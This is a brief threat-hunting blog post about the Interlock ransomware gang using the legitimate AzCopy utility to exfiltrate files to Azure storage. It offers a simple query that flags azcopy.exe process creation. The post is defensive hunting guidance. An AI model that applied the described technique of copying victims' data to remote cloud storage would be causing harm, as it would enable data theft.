204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration

Hello everyone!

Another legitimate tool abused by the ransomware gangs - AzCopy. According to this cybersecurity advisory, Interlock ransomware gang used the tool for data exfiltration.

The tool allows an the adversary to copy files from compromised systems to a remote Azure storage.

As the tool is legitimate, it's another great target for hunting, for example:

event_type: "processcreatewin"

AND

proc_file_path: "azcopy.exe"

Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT.

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge